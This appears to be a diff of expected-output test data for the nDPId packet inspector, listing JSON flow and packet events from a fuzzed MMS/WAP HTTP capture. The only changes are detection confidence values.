+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7580000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -39,7 +39,7 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -61,7 +61,7 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143} 00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -70,14 +70,14 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms","code":0,"content_type":"","user_agent":"SonyricssonT68\/R201A"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms","code":0,"content_type":"","user_agent":"SonyricssonT68\/R201A"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 